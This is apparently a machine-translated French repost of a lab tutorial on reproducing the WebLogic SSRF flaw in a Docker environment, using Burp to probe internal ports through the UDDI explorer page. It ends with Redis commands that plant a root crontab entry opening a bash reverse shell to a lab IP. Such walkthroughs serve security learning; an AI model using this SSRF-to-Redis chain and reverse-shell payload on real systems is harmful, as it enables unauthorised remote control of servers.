Comment reproduire la vulnérabilité SSRF de Weblogic

王林
Libérer: 2023-05-14 20:04:04
avant
1392 Les gens l'ont consulté

1. Utilisez Docker pour créer un environnement

Tutoriel d'installation et de création d'environnement de Docker : https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Étapes de reproduction de la vulnérabilité如何实现Weblogic SSRF漏洞复现2.

1. La vulnérabilité existe sur la page/uddiexplorer/SearchPublicRegistries.jsp

2 Vérifiez l'endroit IBM pour voir如何实现Weblogic SSRF漏洞复现

et constatez qu'il s'agit d'une connexion, ce qui signifie que SSRF peut exister如何实现Weblogic SSRF漏洞复现

3. Utilisez la suite burp pour capturer les paquets. Cliquez sur Rechercher

如何实现Weblogic SSRF漏洞复现

4 Modifiez la connexion des paramètres de l'opérateur如何实现Weblogic SSRF漏洞复现

5. L'accès aux ports non existants n'a pas pu se connecter via HTTP如何实现Weblogic SSRF漏洞复现

.

L'accès aux ports existants renvoie le code d'état

如何实现Weblogic SSRF漏洞复现

Accédez à l'intranet

如何实现Weblogic SSRF漏洞复现

Utilisez Redis pour rebondir la charge utile du shell

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Copier après la connexion

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:yisu.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal